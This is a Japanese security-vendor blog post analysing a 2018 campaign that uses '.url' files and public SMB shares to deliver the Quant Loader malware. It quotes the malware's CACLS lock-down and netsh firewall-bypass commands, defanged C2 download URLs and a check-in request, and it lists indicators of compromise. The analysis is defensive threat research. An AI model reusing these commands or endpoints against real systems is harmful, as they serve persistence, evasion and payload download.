• 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
Seqrite ラボ Blog
営業担当者へ連絡 攻撃を受けているのか?
  • 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
ホーム  /  サーバー向けウイルス対策  / 新たに出現した「.url」マルウェア攻撃キャンペーンの詳細な分析
新たに出現した「.url」マルウェアキャンペーンの詳細な分析
19 3月 2018

新たに出現した「.url」マルウェアキャンペーンの詳細な分析

著者 プラディープ・クルカルニ
プラディープ・クルカルニ
サーバー向けウイルス対策
5
株式

先週、マルウェア拡散に利用される新たな攻撃手法「.url」の出現についてブログ記事を掲載しました。今回の記事では、この「.url」攻撃手法の攻撃チェーンを詳細に分析し、これを積極的に利用しているQuant Loaderマルウェアについて詳しく解説します。

この攻撃で観察された実行シーケンスを示す以下の攻撃チェーンを見てみましょう。この攻撃では、「.url」ファイルがマルウェアの拡散に使用されています。

図1. 攻撃チェーン
図1. 攻撃チェーン

以下は攻撃チェーンのプロセス概要の図です。

図2. プロセスの概要
図2. プロセスの概要

上で説明したように、通常「.url」にはURL(「https://」または「https://」)が含まれますが、このケースでは、SMB共有にアクセスして悪意のあるJavaScriptが実行されることが確認されました。

図3. SMB共有にアクセスする.URLファイル
図3. SMB共有にアクセスする.URLファイル

上記のファイルは CVE-2016-3353 に関連しており、Internet Explorer がインターネット ゾーンの '.url' ファイルを不適切に処理し、リモートの攻撃者が細工したファイルを使用して意図されたアクセス制限を回避できるようになります。

これらのSMB共有は公開されており、認証なしでアクセスできます。図3と図4は、悪意のあるJavaScriptファイルが保存されている公開SMB共有の場所「buyviagraoverthecounterusabb[.]net/documents/」を示しています。悪意のあるSMB共有の場所のIPアドレスは「91.102.153.90」です。

図4. SMBアクセス共有中の通信キャプチャ
図4. SMBアクセス共有中の通信キャプチャ
図5. 公開保存されたJavaScriptファイル
図5. 公開保存されたJavaScriptファイル

次の図は、SMB プロトコル経由で被害者に配信される悪意のある JavaScript を示しています。

図6. SMBリクエスト
図6. SMBリクエスト

悪意のある JavaScript を開くと、「wscript.exe」アプリケーションによって開かれます。

図7. ユーザープロンプト
図7. ユーザープロンプト

図 5 に示すように、被害者が「開く」をクリックすると、悪意のある JavaScript によって第 XNUMX 段階のマルウェアがダウンロードされます。この悪意のある JavaScript は高度に難読化されており、第 XNUMX 段階のダウンローダーとしてのみ使用されます。

図8. 悪意のあるJavaScriptダウンローダー
図8. 悪意のあるJavaScriptダウンローダー

第2段階のマルウェアはJavaScriptによって「%TEMP%」の場所にダウンロードされ、「cmd.exe」を介して起動されます。これは高度に難読化された実行ファイルで、メモリ内で直接実行されます。このマルウェアは「Quant Loader」の亜種であるようで、他のマルウェアをダウンロードするために使用できます。Quick Heal Security Labsによる分析時点では、Quant Loaderによってダウンロードされたマルウェアは確認されていません。Quant Loaderマルウェアの動作を見てみましょう。

Quant Loaderマルウェアは、「Keyboard Layout\Preload」を通じてシステムのすべてのキーボードロケールをチェックします。ロケールがロシア語、ウクライナ語、カザフスタン語のいずれかである場合、マルウェアは終了します。

図9. システムのロケールを確認する
図9. システムのロケールを確認する

Quant Loaderは、以下のレジストリキーを利用して、被害者のシステムの32ビット/64ビット構成を識別します。そして、CnCサーバーとの通信時に、同じ情報をCNCリクエストの一部として使用します。

HKLM\ SOFTWARE \ Microsoft \ Windows \ CurrentVersion ProgramFilesDir (x86)

また、次のレジストリ エントリの存在も確認します。

図10. さまざまなセキュリティ製品の存在を確認する
図10. さまざまなセキュリティ製品の存在を確認する

「dwm.exe」という名前の自己コピーを「 \<8桁の数字>'フォルダを作成し、レジストリの「Run」エントリを通じて自動実行するように設定します。これはシステム内での永続性を確保するために行われます。

図11. マルウェアファイルの自己コピー
図11. マルウェアファイルの自己コピー

この8桁の数字は、CNCサーバーとの通信時にボットID(BotId)として使用されます。BotIdは次の手順で生成されます。

  1. 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid' を読み取ります
  2. マシンIDの値から発生する数字のみを抽出します
  3. 最初の5桁を省略し、8桁目以降の5桁を考慮します
図12. MachineGuidをBotIdとして使用する
図12. MachineGuidをBotIdとして使用する

次に、ログインしているユーザーに対し、8桁のフォルダと「dwm.exe」ファイルのユーザーアクセス権限を読み取りモードに変更します。これにより、ユーザーはフォルダと「dwm.exe」を削除または変更できなくなります。これは、正規のCACLS Windowsファイルを使用し、以下のコマンドを実行することで実現されます。

cmd /c echo Y|CACLS “c:\users\ \appdata\roaming\48378942\dwm.exe” /P “ :R”

 次に、Quant Loader は「Quant」という名前でファイアウォールに以下のルールを追加します。これにより、マルウェアはファイアウォール ルールを回避してインターネット上で通信できるようになります。

netsh advfirewall ファイアウォール ルール名=”Quant” プログラム=”c:\users\ を追加\appdata\roaming\48378942\dwm.exe” dir=出力アクション=許可

また、CNCドメイン「wassronledorhad[.]in」に接続して、他の悪意のあるファイルをダウンロードしようとします。

解析実行時、CNCは応答していませんでした。しかし、静的解析により、Quant LoaderのCNC通信やその他の機能に関する知見が得られました。

CNC サーバーが稼働していれば、以下のファイルがダウンロードされているはずです。

hxxp://wassronledorhad.in/q2/lib/zs.dll.c
hxxp://wassronledorhad.in/q2/lib/bs.dll.c
hxxp://wassronledorhad.in/q2/lib/sql.dll.c

これらのファイルは、それぞれ zs.dll、bs.dll、sqlite3.dll として %APPDATA%\z フォルダーに保存されます。

図13. ダウンロードファイル名
図13. ダウンロードファイル名

「zs.dll」と「sqlite3.dll」のファイルサイズが0x20000未満であるかどうかを確認します。その後、zs.dllから「Main」関数を実行します。

図14. ダウンロードしたDLLをロードして実行する
図14. ダウンロードしたDLLをロードして実行する

Quant Loader は、CNC サーバーに次の要求を送信しようとしました。

hxxp://wassronledorhad[.]in/q2/index.php?id=48378942&c=2&mk=75490e&il=H&vr=1.73&bt=32

ここで、id = BotId、c = リクエストカウンタ、bt = 32/64ビットシステム

次の構造を持つ CNC サーバーからのコマンドを待機します。

[ボットID][コマンド][データ]

コマンドは「pwd」、「exe」、「doc」、「dll」のいずれかになります。

図15. ボットコマンドのリスト
図15. ボットコマンドのリスト

「pwd」コマンドは「Main」関数でzs.dllを実行していることも判明しました。

残りのコマンドについては、マルウェアは「temp」フォルダーに Windows タイムスタンプの名前のファイルを作成します。

図16. システム時間を使用してファイル名を作成する
図16. システム時間を使用してファイル名を作成する

コマンドが「exe」の場合、ShellExecute API を使用してファイルを実行します。

図17. ダウンロードしたexeファイルを実行するためのShellExecuteの呼び出し
図17. ダウンロードしたexeファイルを実行するためのShellExecuteの呼び出し

コマンドが「doc」の場合、WinExec API を使用してファイルを実行します。

図18. ダウンロードしたdocファイルを実行するためのWinExecの呼び出し
図18. ダウンロードしたdocファイルを実行するためのWinExecの呼び出し

コマンドが「dll」の場合、前述の図13に示すように、「LoadLibrary」と「GetProcaddress」を使用してdllから目的の機能を実行します。

したがって、コマンドに応じて、ボットは他の悪意のあるファイルをダウンロードして実行する可能性があります。

「.Url」攻撃ベクトルは現在、Quant Loaderによって使用されています。今後数日間で、この初歩的な攻撃ベクトル(.url)が他のマルウェアファミリーでも利用されるケースが増える可能性があります。

侵害の兆候:

50C359167CC74A962CACAFF2A795B23C
4394536E9A53B94A2634C68043E76EF8
buyviagraoverthecounterusabb[.]net/documents/B200795218387[.]js
91.102.153.90

主題の専門家

  • プラディープ・クルカルニ、アマル・パティル、アニルッダ・ドラス |クイックヒールセキュリティラボ

 以前の投稿ネットワークセキュリティソリューションに必須の5つの機能
次の投稿  サイバーセキュリティの優先順位付け: どこから始めるべきか?
プラディープ・クルカルニ

プラディープ・クルカルニについて

Pradeep Kulkarniは、Quick Heal Technologies LimitedのIPSチームを率いています。ITセキュリティ業界で11年以上のキャリアを持ち、様々なセキュリティソリューションを開発してきました。

Pradeep Kulkarniによる記事 »

関連記事

  • サーバー向けウイルス対策: 複雑なネットワークのための包括的なソリューション

    2018 年 4 月 2 日
  • なぜ会社のサーバーとネットワークを安全に保つ必要があるのでしょうか?

    18年2017月XNUMX日
注目の著者
  • Seqrite
    Seqrite

    Seqrite は、大手企業向けサイバーセキュリティソリューションプロバイダーです。重点分野は…

    より多くの記事を読んで Seqrite
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    Jyoti Karlekar の記事をもっと読む
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    Bineesh P によるその他の記事を読む
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    サンジャイ・カトカーによるその他の記事を読む
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (341) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (51) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) data privacy (16) データ保護 (34) データセキュリティ (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) エンドポイントセキュリティ (113) エンタープライズセキュリティ (20) 悪用する (13) GDPR (14) マルウェア (76) マルウェア分析 (14) マルウェア攻撃 (23) MDM (27) Microsoft (15) MITER ATT&CK (14) ネットワークセキュリティ (26) フィッシング詐欺 (30) ランサムウェア (69) ransomware攻撃 (31) ransomware攻撃 (31) ransomwareの保護 (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) 脅威の検出 (14) Threat Intelライセンス (21) UTM (34) 脆弱性 (16) ゼロトラスト (13)
Seqrite ラボ

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

続きを読む Seqrite

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • オンプレミス
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • マイクロビジネス
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • サイバーセキュリティと Data Privacy Awareness
資料
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • 理解する Data Privacy
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
  • プライバシーアワー
お問い合わせ
  • 登記事務所
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • 学校区概要 Seqrite
  • リーダーシップ
  • 受賞
  • ニュースルーム
パートナー
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite 認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約